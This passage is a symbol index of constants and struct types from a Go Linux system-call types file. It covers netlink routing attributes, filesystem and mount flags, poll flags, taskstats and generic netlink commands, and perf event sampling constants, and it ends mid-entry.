RTA_FLOW (line 624) | RTA_FLOW = 0xb constant RTA_CACHEINFO (line 625) | RTA_CACHEINFO = 0xc constant RTA_TABLE (line 626) | RTA_TABLE = 0xf constant RTA_MARK (line 627) | RTA_MARK = 0x10 constant RTA_MFC_STATS (line 628) | RTA_MFC_STATS = 0x11 constant RTA_VIA (line 629) | RTA_VIA = 0x12 constant RTA_NEWDST (line 630) | RTA_NEWDST = 0x13 constant RTA_PREF (line 631) | RTA_PREF = 0x14 constant RTA_ENCAP_TYPE (line 632) | RTA_ENCAP_TYPE = 0x15 constant RTA_ENCAP (line 633) | RTA_ENCAP = 0x16 constant RTA_EXPIRES (line 634) | RTA_EXPIRES = 0x17 constant RTA_PAD (line 635) | RTA_PAD = 0x18 constant RTA_UID (line 636) | RTA_UID = 0x19 constant RTA_TTL_PROPAGATE (line 637) | RTA_TTL_PROPAGATE = 0x1a constant RTA_IP_PROTO (line 638) | RTA_IP_PROTO = 0x1b constant RTA_SPORT (line 639) | RTA_SPORT = 0x1c constant RTA_DPORT (line 640) | RTA_DPORT = 0x1d constant RTN_UNSPEC (line 641) | RTN_UNSPEC = 0x0 constant RTN_UNICAST (line 642) | RTN_UNICAST = 0x1 constant RTN_LOCAL (line 643) | RTN_LOCAL = 0x2 constant RTN_BROADCAST (line 644) | RTN_BROADCAST = 0x3 constant RTN_ANYCAST (line 645) | RTN_ANYCAST = 0x4 constant RTN_MULTICAST (line 646) | RTN_MULTICAST = 0x5 constant RTN_BLACKHOLE (line 647) | RTN_BLACKHOLE = 0x6 constant RTN_UNREACHABLE (line 648) | RTN_UNREACHABLE = 0x7 constant RTN_PROHIBIT (line 649) | RTN_PROHIBIT = 0x8 constant RTN_THROW (line 650) | RTN_THROW = 0x9 constant RTN_NAT (line 651) | RTN_NAT = 0xa constant RTN_XRESOLVE (line 652) | RTN_XRESOLVE = 0xb constant SizeofNlMsghdr (line 653) | SizeofNlMsghdr = 0x10 constant SizeofNlMsgerr (line 654) | SizeofNlMsgerr = 0x14 constant SizeofRtGenmsg (line 655) | SizeofRtGenmsg = 0x1 constant SizeofNlAttr (line 656) | SizeofNlAttr = 0x4 constant SizeofRtAttr (line 657) | SizeofRtAttr = 0x4 constant SizeofIfInfomsg (line 658) | SizeofIfInfomsg = 0x10 constant SizeofIfAddrmsg (line 659) | SizeofIfAddrmsg = 0x8 constant SizeofIfaCacheinfo (line 660) | SizeofIfaCacheinfo = 0x10 constant SizeofRtMsg (line 661) | SizeofRtMsg = 0xc constant SizeofRtNexthop (line 662) | SizeofRtNexthop = 0x8 constant SizeofNdUseroptmsg (line 663) | SizeofNdUseroptmsg = 0x10 constant SizeofNdMsg (line 664) | SizeofNdMsg = 0xc type NlMsghdr (line 667) | type NlMsghdr struct type NlMsgerr (line 675) | type NlMsgerr struct type RtGenmsg (line 680) | type RtGenmsg struct type NlAttr (line 684) | type NlAttr struct type RtAttr (line 689) | type RtAttr struct type IfInfomsg (line 694) | type IfInfomsg struct type IfAddrmsg (line 703) | type IfAddrmsg struct type IfaCacheinfo (line 711) | type IfaCacheinfo struct type RtMsg (line 718) | type RtMsg struct type RtNexthop (line 730) | type RtNexthop struct type NdUseroptmsg (line 737) | type NdUseroptmsg struct type NdMsg (line 748) | type NdMsg struct constant ICMP_FILTER (line 759) | ICMP_FILTER = 0x1 constant ICMPV6_FILTER (line 761) | ICMPV6_FILTER = 0x1 constant ICMPV6_FILTER_BLOCK (line 762) | ICMPV6_FILTER_BLOCK = 0x1 constant ICMPV6_FILTER_BLOCKOTHERS (line 763) | ICMPV6_FILTER_BLOCKOTHERS = 0x3 constant ICMPV6_FILTER_PASS (line 764) | ICMPV6_FILTER_PASS = 0x2 constant ICMPV6_FILTER_PASSONLY (line 765) | ICMPV6_FILTER_PASSONLY = 0x4 constant SizeofSockFilter (line 769) | SizeofSockFilter = 0x8 type SockFilter (line 772) | type SockFilter struct type SockFprog (line 779) | type SockFprog struct type InotifyEvent (line 784) | type InotifyEvent struct constant SizeofInotifyEvent (line 791) | SizeofInotifyEvent = 0x10 constant SI_LOAD_SHIFT (line 793) | SI_LOAD_SHIFT = 0x10 type Utsname (line 795) | type Utsname struct constant AT_EMPTY_PATH (line 805) | AT_EMPTY_PATH = 0x1000 constant AT_FDCWD (line 806) | AT_FDCWD = -0x64 constant AT_NO_AUTOMOUNT (line 807) | AT_NO_AUTOMOUNT = 0x800 constant AT_REMOVEDIR (line 808) | AT_REMOVEDIR = 0x200 constant AT_STATX_SYNC_AS_STAT (line 810) | AT_STATX_SYNC_AS_STAT = 0x0 constant AT_STATX_FORCE_SYNC (line 811) | AT_STATX_FORCE_SYNC = 0x2000 constant AT_STATX_DONT_SYNC (line 812) | AT_STATX_DONT_SYNC = 0x4000 constant AT_RECURSIVE (line 814) | AT_RECURSIVE = 0x8000 constant AT_SYMLINK_FOLLOW (line 816) | AT_SYMLINK_FOLLOW = 0x400 constant AT_SYMLINK_NOFOLLOW (line 817) | AT_SYMLINK_NOFOLLOW = 0x100 constant AT_EACCESS (line 819) | AT_EACCESS = 0x200 constant OPEN_TREE_CLONE (line 821) | OPEN_TREE_CLONE = 0x1 constant MOVE_MOUNT_F_SYMLINKS (line 823) | MOVE_MOUNT_F_SYMLINKS = 0x1 constant MOVE_MOUNT_F_AUTOMOUNTS (line 824) | MOVE_MOUNT_F_AUTOMOUNTS = 0x2 constant MOVE_MOUNT_F_EMPTY_PATH (line 825) | MOVE_MOUNT_F_EMPTY_PATH = 0x4 constant MOVE_MOUNT_T_SYMLINKS (line 826) | MOVE_MOUNT_T_SYMLINKS = 0x10 constant MOVE_MOUNT_T_AUTOMOUNTS (line 827) | MOVE_MOUNT_T_AUTOMOUNTS = 0x20 constant MOVE_MOUNT_T_EMPTY_PATH (line 828) | MOVE_MOUNT_T_EMPTY_PATH = 0x40 constant MOVE_MOUNT_SET_GROUP (line 829) | MOVE_MOUNT_SET_GROUP = 0x100 constant FSOPEN_CLOEXEC (line 831) | FSOPEN_CLOEXEC = 0x1 constant FSPICK_CLOEXEC (line 833) | FSPICK_CLOEXEC = 0x1 constant FSPICK_SYMLINK_NOFOLLOW (line 834) | FSPICK_SYMLINK_NOFOLLOW = 0x2 constant FSPICK_NO_AUTOMOUNT (line 835) | FSPICK_NO_AUTOMOUNT = 0x4 constant FSPICK_EMPTY_PATH (line 836) | FSPICK_EMPTY_PATH = 0x8 constant FSMOUNT_CLOEXEC (line 838) | FSMOUNT_CLOEXEC = 0x1 constant FSCONFIG_SET_FLAG (line 840) | FSCONFIG_SET_FLAG = 0x0 constant FSCONFIG_SET_STRING (line 841) | FSCONFIG_SET_STRING = 0x1 constant FSCONFIG_SET_BINARY (line 842) | FSCONFIG_SET_BINARY = 0x2 constant FSCONFIG_SET_PATH (line 843) | FSCONFIG_SET_PATH = 0x3 constant FSCONFIG_SET_PATH_EMPTY (line 844) | FSCONFIG_SET_PATH_EMPTY = 0x4 constant FSCONFIG_SET_FD (line 845) | FSCONFIG_SET_FD = 0x5 constant FSCONFIG_CMD_CREATE (line 846) | FSCONFIG_CMD_CREATE = 0x6 constant FSCONFIG_CMD_RECONFIGURE (line 847) | FSCONFIG_CMD_RECONFIGURE = 0x7 type OpenHow (line 850) | type OpenHow struct constant SizeofOpenHow (line 856) | SizeofOpenHow = 0x18 constant RESOLVE_BENEATH (line 859) | RESOLVE_BENEATH = 0x8 constant RESOLVE_IN_ROOT (line 860) | RESOLVE_IN_ROOT = 0x10 constant RESOLVE_NO_MAGICLINKS (line 861) | RESOLVE_NO_MAGICLINKS = 0x2 constant RESOLVE_NO_SYMLINKS (line 862) | RESOLVE_NO_SYMLINKS = 0x4 constant RESOLVE_NO_XDEV (line 863) | RESOLVE_NO_XDEV = 0x1 type PollFd (line 866) | type PollFd struct constant POLLIN (line 873) | POLLIN = 0x1 constant POLLPRI (line 874) | POLLPRI = 0x2 constant POLLOUT (line 875) | POLLOUT = 0x4 constant POLLERR (line 876) | POLLERR = 0x8 constant POLLHUP (line 877) | POLLHUP = 0x10 constant POLLNVAL (line 878) | POLLNVAL = 0x20 type sigset_argpack (line 881) | type sigset_argpack struct type SignalfdSiginfo (line 886) | type SignalfdSiginfo struct type Winsize (line 911) | type Winsize struct constant TASKSTATS_CMD_UNSPEC (line 919) | TASKSTATS_CMD_UNSPEC = 0x0 constant TASKSTATS_CMD_GET (line 920) | TASKSTATS_CMD_GET = 0x1 constant TASKSTATS_CMD_NEW (line 921) | TASKSTATS_CMD_NEW = 0x2 constant TASKSTATS_TYPE_UNSPEC (line 922) | TASKSTATS_TYPE_UNSPEC = 0x0 constant TASKSTATS_TYPE_PID (line 923) | TASKSTATS_TYPE_PID = 0x1 constant TASKSTATS_TYPE_TGID (line 924) | TASKSTATS_TYPE_TGID = 0x2 constant TASKSTATS_TYPE_STATS (line 925) | TASKSTATS_TYPE_STATS = 0x3 constant TASKSTATS_TYPE_AGGR_PID (line 926) | TASKSTATS_TYPE_AGGR_PID = 0x4 constant TASKSTATS_TYPE_AGGR_TGID (line 927) | TASKSTATS_TYPE_AGGR_TGID = 0x5 constant TASKSTATS_TYPE_NULL (line 928) | TASKSTATS_TYPE_NULL = 0x6 constant TASKSTATS_CMD_ATTR_UNSPEC (line 929) | TASKSTATS_CMD_ATTR_UNSPEC = 0x0 constant TASKSTATS_CMD_ATTR_PID (line 930) | TASKSTATS_CMD_ATTR_PID = 0x1 constant TASKSTATS_CMD_ATTR_TGID (line 931) | TASKSTATS_CMD_ATTR_TGID = 0x2 constant TASKSTATS_CMD_ATTR_REGISTER_CPUMASK (line 932) | TASKSTATS_CMD_ATTR_REGISTER_CPUMASK = 0x3 constant TASKSTATS_CMD_ATTR_DEREGISTER_CPUMASK (line 933) | TASKSTATS_CMD_ATTR_DEREGISTER_CPUMASK = 0x4 type CGroupStats (line 936) | type CGroupStats struct constant CGROUPSTATS_CMD_UNSPEC (line 945) | CGROUPSTATS_CMD_UNSPEC = 0x3 constant CGROUPSTATS_CMD_GET (line 946) | CGROUPSTATS_CMD_GET = 0x4 constant CGROUPSTATS_CMD_NEW (line 947) | CGROUPSTATS_CMD_NEW = 0x5 constant CGROUPSTATS_TYPE_UNSPEC (line 948) | CGROUPSTATS_TYPE_UNSPEC = 0x0 constant CGROUPSTATS_TYPE_CGROUP_STATS (line 949) | CGROUPSTATS_TYPE_CGROUP_STATS = 0x1 constant CGROUPSTATS_CMD_ATTR_UNSPEC (line 950) | CGROUPSTATS_CMD_ATTR_UNSPEC = 0x0 constant CGROUPSTATS_CMD_ATTR_FD (line 951) | CGROUPSTATS_CMD_ATTR_FD = 0x1 type Genlmsghdr (line 954) | type Genlmsghdr struct constant CTRL_CMD_UNSPEC (line 961) | CTRL_CMD_UNSPEC = 0x0 constant CTRL_CMD_NEWFAMILY (line 962) | CTRL_CMD_NEWFAMILY = 0x1 constant CTRL_CMD_DELFAMILY (line 963) | CTRL_CMD_DELFAMILY = 0x2 constant CTRL_CMD_GETFAMILY (line 964) | CTRL_CMD_GETFAMILY = 0x3 constant CTRL_CMD_NEWOPS (line 965) | CTRL_CMD_NEWOPS = 0x4 constant CTRL_CMD_DELOPS (line 966) | CTRL_CMD_DELOPS = 0x5 constant CTRL_CMD_GETOPS (line 967) | CTRL_CMD_GETOPS = 0x6 constant CTRL_CMD_NEWMCAST_GRP (line 968) | CTRL_CMD_NEWMCAST_GRP = 0x7 constant CTRL_CMD_DELMCAST_GRP (line 969) | CTRL_CMD_DELMCAST_GRP = 0x8 constant CTRL_CMD_GETMCAST_GRP (line 970) | CTRL_CMD_GETMCAST_GRP = 0x9 constant CTRL_CMD_GETPOLICY (line 971) | CTRL_CMD_GETPOLICY = 0xa constant CTRL_ATTR_UNSPEC (line 972) | CTRL_ATTR_UNSPEC = 0x0 constant CTRL_ATTR_FAMILY_ID (line 973) | CTRL_ATTR_FAMILY_ID = 0x1 constant CTRL_ATTR_FAMILY_NAME (line 974) | CTRL_ATTR_FAMILY_NAME = 0x2 constant CTRL_ATTR_VERSION (line 975) | CTRL_ATTR_VERSION = 0x3 constant CTRL_ATTR_HDRSIZE (line 976) | CTRL_ATTR_HDRSIZE = 0x4 constant CTRL_ATTR_MAXATTR (line 977) | CTRL_ATTR_MAXATTR = 0x5 constant CTRL_ATTR_OPS (line 978) | CTRL_ATTR_OPS = 0x6 constant CTRL_ATTR_MCAST_GROUPS (line 979) | CTRL_ATTR_MCAST_GROUPS = 0x7 constant CTRL_ATTR_POLICY (line 980) | CTRL_ATTR_POLICY = 0x8 constant CTRL_ATTR_OP_POLICY (line 981) | CTRL_ATTR_OP_POLICY = 0x9 constant CTRL_ATTR_OP (line 982) | CTRL_ATTR_OP = 0xa constant CTRL_ATTR_OP_UNSPEC (line 983) | CTRL_ATTR_OP_UNSPEC = 0x0 constant CTRL_ATTR_OP_ID (line 984) | CTRL_ATTR_OP_ID = 0x1 constant CTRL_ATTR_OP_FLAGS (line 985) | CTRL_ATTR_OP_FLAGS = 0x2 constant CTRL_ATTR_MCAST_GRP_UNSPEC (line 986) | CTRL_ATTR_MCAST_GRP_UNSPEC = 0x0 constant CTRL_ATTR_MCAST_GRP_NAME (line 987) | CTRL_ATTR_MCAST_GRP_NAME = 0x1 constant CTRL_ATTR_MCAST_GRP_ID (line 988) | CTRL_ATTR_MCAST_GRP_ID = 0x2 constant CTRL_ATTR_POLICY_UNSPEC (line 989) | CTRL_ATTR_POLICY_UNSPEC = 0x0 constant CTRL_ATTR_POLICY_DO (line 990) | CTRL_ATTR_POLICY_DO = 0x1 constant CTRL_ATTR_POLICY_DUMP (line 991) | CTRL_ATTR_POLICY_DUMP = 0x2 constant CTRL_ATTR_POLICY_DUMP_MAX (line 992) | CTRL_ATTR_POLICY_DUMP_MAX = 0x2 constant _CPU_SETSIZE (line 996) | _CPU_SETSIZE = 0x400 constant BDADDR_BREDR (line 1000) | BDADDR_BREDR = 0x0 constant BDADDR_LE_PUBLIC (line 1001) | BDADDR_LE_PUBLIC = 0x1 constant BDADDR_LE_RANDOM (line 1002) | BDADDR_LE_RANDOM = 0x2 type PerfEventAttr (line 1005) | type PerfEventAttr struct type PerfEventMmapPage (line 1030) | type PerfEventMmapPage struct constant PerfBitDisabled (line 1060) | PerfBitDisabled uint64 = CBitFieldMaskBit0 constant PerfBitInherit (line 1061) | PerfBitInherit = CBitFieldMaskBit1 constant PerfBitPinned (line 1062) | PerfBitPinned = CBitFieldMaskBit2 constant PerfBitExclusive (line 1063) | PerfBitExclusive = CBitFieldMaskBit3 constant PerfBitExcludeUser (line 1064) | PerfBitExcludeUser = CBitFieldMaskBit4 constant PerfBitExcludeKernel (line 1065) | PerfBitExcludeKernel = CBitFieldMaskBit5 constant PerfBitExcludeHv (line 1066) | PerfBitExcludeHv = CBitFieldMaskBit6 constant PerfBitExcludeIdle (line 1067) | PerfBitExcludeIdle = CBitFieldMaskBit7 constant PerfBitMmap (line 1068) | PerfBitMmap = CBitFieldMaskBit8 constant PerfBitComm (line 1069) | PerfBitComm = CBitFieldMaskBit9 constant PerfBitFreq (line 1070) | PerfBitFreq = CBitFieldMaskBit10 constant PerfBitInheritStat (line 1071) | PerfBitInheritStat = CBitFieldMaskBit11 constant PerfBitEnableOnExec (line 1072) | PerfBitEnableOnExec = CBitFieldMaskBit12 constant PerfBitTask (line 1073) | PerfBitTask = CBitFieldMaskBit13 constant PerfBitWatermark (line 1074) | PerfBitWatermark = CBitFieldMaskBit14 constant PerfBitPreciseIPBit1 (line 1075) | PerfBitPreciseIPBit1 = CBitFieldMaskBit15 constant PerfBitPreciseIPBit2 (line 1076) | PerfBitPreciseIPBit2 = CBitFieldMaskBit16 constant PerfBitMmapData (line 1077) | PerfBitMmapData = CBitFieldMaskBit17 constant PerfBitSampleIDAll (line 1078) | PerfBitSampleIDAll = CBitFieldMaskBit18 constant PerfBitExcludeHost (line 1079) | PerfBitExcludeHost = CBitFieldMaskBit19 constant PerfBitExcludeGuest (line 1080) | PerfBitExcludeGuest = CBitFieldMaskBit20 constant PerfBitExcludeCallchainKernel (line 1081) | PerfBitExcludeCallchainKernel = CBitFieldMaskBit21 constant PerfBitExcludeCallchainUser (line 1082) | PerfBitExcludeCallchainUser = CBitFieldMaskBit22 constant PerfBitMmap2 (line 1083) | PerfBitMmap2 = CBitFieldMaskBit23 constant PerfBitCommExec (line 1084) | PerfBitCommExec = CBitFieldMaskBit24 constant PerfBitUseClockID (line 1085) | PerfBitUseClockID = CBitFieldMaskBit25 constant PerfBitContextSwitch (line 1086) | PerfBitContextSwitch = CBitFieldMaskBit26 constant PerfBitWriteBackward (line 1087) | PerfBitWriteBackward = CBitFieldMaskBit27 constant PERF_TYPE_HARDWARE (line 1091) | PERF_TYPE_HARDWARE = 0x0 constant PERF_TYPE_SOFTWARE (line 1092) | PERF_TYPE_SOFTWARE = 0x1 constant PERF_TYPE_TRACEPOINT (line 1093) | PERF_TYPE_TRACEPOINT = 0x2 constant PERF_TYPE_HW_CACHE (line 1094) | PERF_TYPE_HW_CACHE = 0x3 constant PERF_TYPE_RAW (line 1095) | PERF_TYPE_RAW = 0x4 constant PERF_TYPE_BREAKPOINT (line 1096) | PERF_TYPE_BREAKPOINT = 0x5 constant PERF_TYPE_MAX (line 1097) | PERF_TYPE_MAX = 0x6 constant PERF_COUNT_HW_CPU_CYCLES (line 1098) | PERF_COUNT_HW_CPU_CYCLES = 0x0 constant PERF_COUNT_HW_INSTRUCTIONS (line 1099) | PERF_COUNT_HW_INSTRUCTIONS = 0x1 constant PERF_COUNT_HW_CACHE_REFERENCES (line 1100) | PERF_COUNT_HW_CACHE_REFERENCES = 0x2 constant PERF_COUNT_HW_CACHE_MISSES (line 1101) | PERF_COUNT_HW_CACHE_MISSES = 0x3 constant PERF_COUNT_HW_BRANCH_INSTRUCTIONS (line 1102) | PERF_COUNT_HW_BRANCH_INSTRUCTIONS = 0x4 constant PERF_COUNT_HW_BRANCH_MISSES (line 1103) | PERF_COUNT_HW_BRANCH_MISSES = 0x5 constant PERF_COUNT_HW_BUS_CYCLES (line 1104) | PERF_COUNT_HW_BUS_CYCLES = 0x6 constant PERF_COUNT_HW_STALLED_CYCLES_FRONTEND (line 1105) | PERF_COUNT_HW_STALLED_CYCLES_FRONTEND = 0x7 constant PERF_COUNT_HW_STALLED_CYCLES_BACKEND (line 1106) | PERF_COUNT_HW_STALLED_CYCLES_BACKEND = 0x8 constant PERF_COUNT_HW_REF_CPU_CYCLES (line 1107) | PERF_COUNT_HW_REF_CPU_CYCLES = 0x9 constant PERF_COUNT_HW_MAX (line 1108) | PERF_COUNT_HW_MAX = 0xa constant PERF_COUNT_HW_CACHE_L1D (line 1109) | PERF_COUNT_HW_CACHE_L1D = 0x0 constant PERF_COUNT_HW_CACHE_L1I (line 1110) | PERF_COUNT_HW_CACHE_L1I = 0x1 constant PERF_COUNT_HW_CACHE_LL (line 1111) | PERF_COUNT_HW_CACHE_LL = 0x2 constant PERF_COUNT_HW_CACHE_DTLB (line 1112) | PERF_COUNT_HW_CACHE_DTLB = 0x3 constant PERF_COUNT_HW_CACHE_ITLB (line 1113) | PERF_COUNT_HW_CACHE_ITLB = 0x4 constant PERF_COUNT_HW_CACHE_BPU (line 1114) | PERF_COUNT_HW_CACHE_BPU = 0x5 constant PERF_COUNT_HW_CACHE_NODE (line 1115) | PERF_COUNT_HW_CACHE_NODE = 0x6 constant PERF_COUNT_HW_CACHE_MAX (line 1116) | PERF_COUNT_HW_CACHE_MAX = 0x7 constant PERF_COUNT_HW_CACHE_OP_READ (line 1117) | PERF_COUNT_HW_CACHE_OP_READ = 0x0 constant PERF_COUNT_HW_CACHE_OP_WRITE (line 1118) | PERF_COUNT_HW_CACHE_OP_WRITE = 0x1 constant PERF_COUNT_HW_CACHE_OP_PREFETCH (line 1119) | PERF_COUNT_HW_CACHE_OP_PREFETCH = 0x2 constant PERF_COUNT_HW_CACHE_OP_MAX (line 1120) | PERF_COUNT_HW_CACHE_OP_MAX = 0x3 constant PERF_COUNT_HW_CACHE_RESULT_ACCESS (line 1121) | PERF_COUNT_HW_CACHE_RESULT_ACCESS = 0x0 constant PERF_COUNT_HW_CACHE_RESULT_MISS (line 1122) | PERF_COUNT_HW_CACHE_RESULT_MISS = 0x1 constant PERF_COUNT_HW_CACHE_RESULT_MAX (line 1123) | PERF_COUNT_HW_CACHE_RESULT_MAX = 0x2 constant PERF_COUNT_SW_CPU_CLOCK (line 1124) | PERF_COUNT_SW_CPU_CLOCK = 0x0 constant PERF_COUNT_SW_TASK_CLOCK (line 1125) | PERF_COUNT_SW_TASK_CLOCK = 0x1 constant PERF_COUNT_SW_PAGE_FAULTS (line 1126) | PERF_COUNT_SW_PAGE_FAULTS = 0x2 constant PERF_COUNT_SW_CONTEXT_SWITCHES (line 1127) | PERF_COUNT_SW_CONTEXT_SWITCHES = 0x3 constant PERF_COUNT_SW_CPU_MIGRATIONS (line 1128) | PERF_COUNT_SW_CPU_MIGRATIONS = 0x4 constant PERF_COUNT_SW_PAGE_FAULTS_MIN (line 1129) | PERF_COUNT_SW_PAGE_FAULTS_MIN = 0x5 constant PERF_COUNT_SW_PAGE_FAULTS_MAJ (line 1130) | PERF_COUNT_SW_PAGE_FAULTS_MAJ = 0x6 constant PERF_COUNT_SW_ALIGNMENT_FAULTS (line 1131) | PERF_COUNT_SW_ALIGNMENT_FAULTS = 0x7 constant PERF_COUNT_SW_EMULATION_FAULTS (line 1132) | PERF_COUNT_SW_EMULATION_FAULTS = 0x8 constant PERF_COUNT_SW_DUMMY (line 1133) | PERF_COUNT_SW_DUMMY = 0x9 constant PERF_COUNT_SW_BPF_OUTPUT (line 1134) | PERF_COUNT_SW_BPF_OUTPUT = 0xa constant PERF_COUNT_SW_MAX (line 1135) | PERF_COUNT_SW_MAX = 0xc constant PERF_SAMPLE_IP (line 1136) | PERF_SAMPLE_IP = 0x1 constant PERF_SAMPLE_TID (line 1137) | PERF_SAMPLE_TID = 0x2 constant PERF_SAMPLE_TIME (line 1138) | PERF_SAMPLE_TIME = 0x4 constant PERF_SAMPLE_ADDR (line 1139) | PERF_SAMPLE_ADDR = 0x8 constant PERF_SAMPLE_READ (line 1140) | PERF_SAMPLE_READ = 0x10 constant PERF_SAMPLE_CALLCHAIN (line 1141) | PERF_SAMPLE_CALLCHAIN = 0x20 constant PERF_SAMPLE_ID (line 1142) | PERF_SAMPLE_ID = 0x40 constant PERF_SAMPLE_CPU (line 1143) | PERF_SAMPLE_CPU = 0x80 constant PERF_SAMPLE_PERIOD (line 1144) | PERF_SAMPLE_PERIOD = 0x100 constant PERF_SAMPLE_STREAM_ID (line 1145) | PERF_SAMPLE_STREAM_ID = 0x200 constant PERF_SAMPLE_RAW (line 1146) | PERF_SAMPLE_RAW = 0x400 constant PERF_SAMPLE_BRANCH_STACK (line 1147) | PERF_SAMPLE_BRANCH_STACK = 0x800 constant PERF_SAMPLE_REGS_USER (line 1148) | PERF_SAMPLE_REGS_USER = 0x1000 constant PERF_SAMPLE_STACK_USER (line 1149) | PERF_SAMPLE_STACK_USER = 0x2000 constant PERF_SAMPLE_WEIGHT (line 1150) | PERF_SAMPLE_WEIGHT = 0x4000 constant PERF_SAMPLE_DATA_SRC (line 1151) | PERF_SAMPLE_DATA_SRC = 0x8000 constant PERF_SAMPLE_IDENTIFIER (line 1152) | PERF_SAMPLE_IDENTIFIER = 0x10000 constant PERF_SAMPLE_TRANSACTION (line 1153) | PERF_SAMPLE_TRANSACTION = 0x20000 constant PERF_SAMPLE_REGS_INTR (line 1154) | PERF_SAMPLE_REGS_INTR = 0x40000 constant PERF_SAMPLE_PHYS_ADDR (line 1155) | PERF_SAMPLE_PHYS_ADDR = 0x80000 constant PERF_SAMPLE_AUX (line 1156) | PERF_SAMPLE_AUX = 0x100000 constant PERF_SAMPLE_CGROUP (line 1157) | PERF_SAMPLE_CGROUP = 0x200000 constant PERF_SAMPLE_DATA_PAGE_SIZE (line 1158) | PERF_SAMPLE_DATA_PAGE_SIZE = 0x400000 constant PERF_SAMPLE_CODE_PAGE_SIZE (line 1159) | PERF_SAMPLE_CODE_PAGE_SIZE = 0x800000 constant PERF_SAMPLE_WEIGHT_STRUCT (line 1160) | PERF_SAMPLE_WEIGHT_STRUCT = 0x1000000 constant PERF_SAMPLE_MAX (line 1161) | PERF_SAMPLE_MAX = 0x2000000 constant PERF_SAMPLE_BRANCH_USER_SHIFT (line 1162) | PERF_SAMPLE_BRANCH_USER_SHIFT = 0x0 constant PERF_SAMPLE_BRANCH_KERNEL_SHIFT (line 1163) | PERF_SAMPLE_BRANCH_KERNEL_SHIFT = 0x1 constant PERF_SAMPLE_BRANCH_HV_SHIFT (line 1164) | PERF_SAMPLE_BRANCH_HV_SHIFT = 0x2 constant PERF_SAMPLE_BRANCH_ANY_SHIFT (line 1165) | PERF_SAMPLE_BRANCH_ANY_SHIFT = 0x3 constant PERF_SAMPLE_BRANCH_ANY_CALL_SHIFT (line 1166) | PERF_SAMPLE_BRANCH_ANY_CALL_SHIFT = 0x4 constant PERF_SAMPLE_BRANCH_ANY_RETURN_SHIFT (line 1167) | PERF_SAMPLE_BRANCH_ANY_RETURN_SHIFT = 0x5 constant PERF_SAMPLE_BRANCH_IND_CALL_SHIFT (line 1168) | PERF_SAMPLE_BRANCH_IND_CALL_SHIFT = 0x6 constant PERF_SAMPLE_BRANCH_ABORT_TX_SHIFT (line 1169) | PERF_SAMPLE_BRANCH_ABORT_TX_SHIFT = 0x7 constant PERF_SAMPLE_BRANCH_IN_TX_SHIFT (line 1170) | PERF_SAMPLE_BRANCH_IN_TX_SHIFT = 0x8 constant PERF_SAMPLE_BRANCH_NO_TX_SHIFT (line 1171) | PERF_SAMPLE_BRANCH_NO_TX_SHIFT = 0x9 constant PERF_SAMPLE_BRANCH_COND_SHIFT (line 1172) | PERF_SAMPLE_BRANCH_COND_SHIFT = 0xa constant PERF_SAMPLE_BRANCH_CALL_STACK_SHIFT (line 1173) | PERF_SAMPLE_BRANCH_CALL_STACK_SHIFT = 0xb constant PERF_SAMPLE_BRANCH_IND_JUMP_SHIFT (line 1174) | PERF_SAMPLE_BRANCH_IND_JUMP_SHIFT = 0xc constant PERF_SAMPLE_BRANCH_CALL_SHIFT (line 1175) | PERF_SAMPLE_BRANCH_CALL_SHIFT = 0xd constant PERF_SAMPLE_BRANCH_NO_FLAGS_SHIFT (line 1176) | PERF_SAMPLE_BRANCH_NO_FLAGS_SHIFT = 0xe constant PERF_SAMPLE_BRANCH_NO_CYCLES_SHIFT (line 1177) | PERF_SAMPLE_BRANCH_NO_CYCLES_SHIFT = 0xf constant PERF_SAMPLE_BRANCH_TYPE_SAVE_SHIFT (line 1178) | PERF_SAMPLE_BRANCH_TYPE_SAVE_SHIFT = 0x10 constant PERF_SAMPLE_BRANCH_HW_INDEX_SHIFT (line 1179) | PERF_SAMPLE_BRANCH_HW_INDEX_SHIFT = 0x11 constant PERF_SAMPLE_BRANCH_PRIV_SAVE_SHIFT (line 1180) | PERF_SAMPLE_BRANCH_PRIV_SAVE_SHIFT = 0x12 constant PERF_SAMPLE_BRANCH_MAX_SHIFT (line 1181) | PERF_SAMPLE_BRANCH_MAX_SHIFT = 0x13 constant PERF_SAMPLE_BRANCH_USER (line 1182) | PERF_SAMPLE_BRANCH_USER = 0x1 constant PERF_SAMPLE_BRANCH_KERNEL (line 1183) | PERF_SAMPLE_BRANCH_KERNEL = 0x2 constant PERF_SAMPLE_BRANCH_HV (line 1184) | PERF_SAMPLE_BRANCH_HV = 0x4 constant PERF_SAMPLE_BRANCH_ANY (line 1185) | PERF_SAMPLE_BRANCH_ANY = 0x8 constant PERF_SAMPLE_BRANCH_ANY_CALL (line 1186) | PERF_SAMPLE_BRANCH_ANY_CALL = 0x10 constant PERF_SAMPLE_BRANCH_ANY_RETURN (line 1187) | PERF_SAMPLE_BRANCH_ANY_RETURN = 0x20 constant PERF_SAMPLE_BRANCH_IND_CALL (line 1188) | PERF_SAMPLE_BRANCH_IND_CALL = 0x40 constant PERF_SAMPLE_BRANCH_ABORT_TX (line 1189) | PERF_SAMPLE_BRANCH_ABORT_TX = 0x80 constant PERF_SAMPLE_BRANCH_IN_TX (line 1190) | PERF_SAMPLE_BRANCH_IN_TX = 0x100 constant PERF_SAMPLE_BRANCH_NO_TX (line 1191) | PERF_SAMPLE_BRANCH_NO_TX = 0x200 constant PERF_SAMPLE_BRANCH_COND (line 1192) | PERF_SAMPLE_BRANCH_COND = 0x400 constant PERF_SAMPLE_BRANCH_CALL_STACK (line 1193) | PERF_SAMPLE_BRANCH_CALL_STACK = 0x800 constant PERF_SAMPLE_BRANCH_IND_JUMP (line 1194) | PERF_SAMPLE_BRANCH_IND_JUMP = 0x1000 constant PERF_SAMPLE_BRANCH_CALL (line 1195) | PERF_SAMPLE_BRANCH_CALL = 0x2000 constant PERF_SAMPLE_BRANCH_NO_FLAGS (line 1196) | PERF_SAMPLE_BRANCH_NO_FLAGS = 0x4000 constant PERF_SAMPLE_BRANCH_NO_CYCLES (line 1197) | PERF_SAMPLE_BRANCH_NO_CYCLES = 0x8000 constant PERF_SAMPLE_BRANCH_TYPE_SAVE (line 1198) | PERF_SAMPLE_BRANCH_TYPE_SAVE = 0x10000 constant PERF_SAMPLE_BRANCH_HW_INDEX (line 1199) | PERF_SAMPLE_BRANCH_HW_INDEX = 0x20000 constant PERF_SAMPLE_BRANCH_PRIV_SAVE (line 1200) | PERF_SAMPLE_BRANCH_PRIV_SAVE = 0x40000 constant PERF_SAMPLE_BRANCH_MAX (line 1201) | PERF_SAMPLE_BRANCH_MAX = 0x80000 constant PERF_BR_UNKNOWN (line 1202) | PERF_BR_UNKNOWN = 0x0 constant PERF_BR_COND (line 1203) | 